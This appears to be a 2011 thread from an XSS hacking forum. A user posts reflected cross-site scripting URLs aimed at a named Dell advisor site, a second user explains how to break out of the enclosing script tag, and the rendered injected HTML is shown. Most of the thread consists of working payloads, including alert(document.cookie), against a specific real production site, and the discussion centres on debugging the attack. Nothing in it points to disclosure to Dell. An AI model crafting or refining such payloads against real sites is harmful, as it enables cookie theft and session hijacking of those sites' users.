Dell XSS Info

sla.ckers.org is
ha.ckers sla.cking

Q and A for any cross site scripting information. Feel free to ask away.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

Dell XSS Info

Posted by: VMw4r3

Date: April 06, 2011 05:27PM

I found xss in dell but can someone explain why URL1 wont work.

URL1:
http://advisors.dell.com/advisorweb/Advisor.aspx?advisor=214e88fe-eb6e-4d1c-86bf-b7d7dd092c38&c="><script>alert(document.cookie)</script>

But when I use URL2 it works.

URL2:
http://advisors.dell.com/advisorweb/Advisor.aspx?advisor=214e88fe-eb6e-4d1c-86bf-b7d7dd092c38&c="><script></script><script>alert(document.cookie)</script>

And below why it will only alert(2) and not alert(1)

http://advisors.dell.com/advisorweb/Advisor.aspx?advisor=214e88fe-eb6e-4d1c-86bf-b7d7dd092c38&c="><script>alert(1)</script><script>alert(2)</script>

cheers

Options: Reply•Quote

Re: Dell XSS Info

Posted by: lightos

Date: April 06, 2011 07:26PM

Have you looked at the source code? You're already inside a <script> tag.

EDIT: Nvm, was looking at the wrong injection point.

EDIT 2: You need to close the first script tag, so "></script><script>alert(0);</script>

Edited 2 time(s). Last edit at 04/06/2011 07:59PM by lightos.

Options: Reply•Quote

Re: Dell XSS Info

Posted by: VMw4r3

Date: April 06, 2011 09:43PM

I can see now.
Must of be going blind earlier.

<script language="javascript" src="/AdvisorWeb/Advisor.js.aspx?Advisor=214e88fe-eb6e-4d1c-86bf-b7d7dd092c38&c="></script><script>alert(document.cookie)</script>&l=EN&cs=&culture=en-us&soln="></script>

Thanks lightos

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login